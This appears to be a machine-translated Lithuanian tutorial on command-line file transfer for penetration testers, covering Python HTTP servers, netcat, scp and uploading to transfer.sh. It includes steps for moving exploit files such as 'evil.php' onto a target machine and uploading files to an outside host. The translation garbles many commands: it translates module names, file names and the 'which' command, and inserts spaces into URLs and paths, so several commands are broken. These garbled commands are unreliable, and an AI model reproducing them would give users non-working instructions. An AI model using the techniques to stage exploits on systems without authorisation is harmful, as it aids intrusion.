Vykdant įsiskverbimo bandymus dažnai reikia perduoti išnaudojimus, pitono scenarijus ir įkelti modulius. Kadangi terminalas yra dažniausiai naudojamas įrankis, būtina suprasti failų perkėlimo pagrindus.
Rašiklių testeris turėtų būti gerai aprūpintas įvairiomis gudrybėmis, norint perkelti failus iš nuotolinio serverio, taip pat iš vieno katalogo į kitą. Šioje pamokoje aptarsime įvairius failų perdavimo būdus naudodami komandinę eilutę.
1. „Python“ serveris
„Python“ yra pagrindinis paketas, iš anksto įdiegtas beveik visose „Debian“ sistemose. Norėdami perkelti failą iš vieno įrenginio į kitą, atlikite šiuos veiksmus:
„Python2“:
Perjunkite į katalogą, kuriame yra jūsų failas, kurį norite perkelti. Paleiskite paprastą python serverį. Įveskite šią komandą;
$ python -m „SimpleHTTPServer 8080“
Dabar eikite į mašiną, į kurią norite perkelti failą. Norėdami atsisiųsti failą, naudokite šią komandą;
$ wget http: // 192.168.43.177: 8080 / byla
Nepamirškite pakeisti failo IP, prievado numerio ir pavadinimo.
„Python3“:
Viskas, kas parašyta python2, beveik visada sulaužys python3. Taigi mes taip pat žiūrime, kaip perkelti failą naudojant python3.
Python3 atveju įveskite šią komandą, kad paleistumėte paprastą python serverį.
$ python3 -m http.serveris 8080
Norėdami atsisiųsti failą į tikslą, įveskite šią komandą;
$ wget http: // 192.168.43.177: 8080 / išnaudoti.php
2. „Netcat“
„Netcat“ yra galinga priemonė failams perkelti iš bet kurio nuotolinio kompiuterio į vietinį. Jis ne visada gali būti įdiegtas. Galite patikrinti, ar jis egzistuoja, ar ne, įvesdami;
$ kuris netcat
Arba įvesdami;$ kuri nc
Sukurkite „netcat“ serverį naudodami šią komandą;
$ nc -nlvp 8080 < evil.php
Dabar eikite į tikslinę mašiną ir įveskite šiuos duomenis, kad atsisiųstumėte failą;
$ nc -nv 192.168.43.177 8080> blogis.php
Pakeiskite nc
su netcat
aukščiau pateiktose komandose, jei nc neveikia arba nėra tinkamai įdiegtas.
3. SCP
Saugaus kopijavimo protokolas yra galingas failų perkėlimo įrankis. Tai praverčia ypač tada, kai norite perkelti katalogus. Tai taip pat dažniausiai naudojama failų perdavimui per ssh.
Jei norite perkelti failą per ssh, siuntimo mašinoje įveskite šią komandą;
$ scp -i nauja.pem testas.py ubuntu @ 18.220.68.229: / home / ubuntu
Kur -i reiškia viešąjį ssh prisijungimo raktą, testą.py yra perkeliamas failas, o / home / ubuntu yra tikslinis katalogas, kuriame norime išsaugoti failą.
Norėdami atsisiųsti failą iš nuotolinio kompiuterio, įveskite šią komandą;
$ scp šaknis @ 192.168.43.177: / nuotolinis_katalogas / failas / vietinis / katalogas
4. Perkėlimas.sh
Failams perkelti galite naudoti šį trečiosios šalies įrankį. Tai gali būti naudinga, kai neturite mašinos su viešu IP ir vis tiek turite perkelti failus. Ši komanda įkelia failą į perkėlimą.sh serveriai;
$ curl --upload-file ./ failas.txt https: // perduoti.sh / failas.txt
Norėdami atsisiųsti failą, įveskite šią komandą;
$ curl https: // transfer.sh // failas.txt -o failas.txt
Perkėlimas.sh vis dar kuriama ir gali ne visada veikti.
Išvada
Komandinės eilutės įrankiai suteikia mums galimybę perkelti failus įvairiais būdais. Tai gali atrodyti šiek tiek sudėtinga, tačiau praktinis jų naudojimas suteikia galimybę lengvai tvarkyti failus, ypač kai nėra GUI parinkties.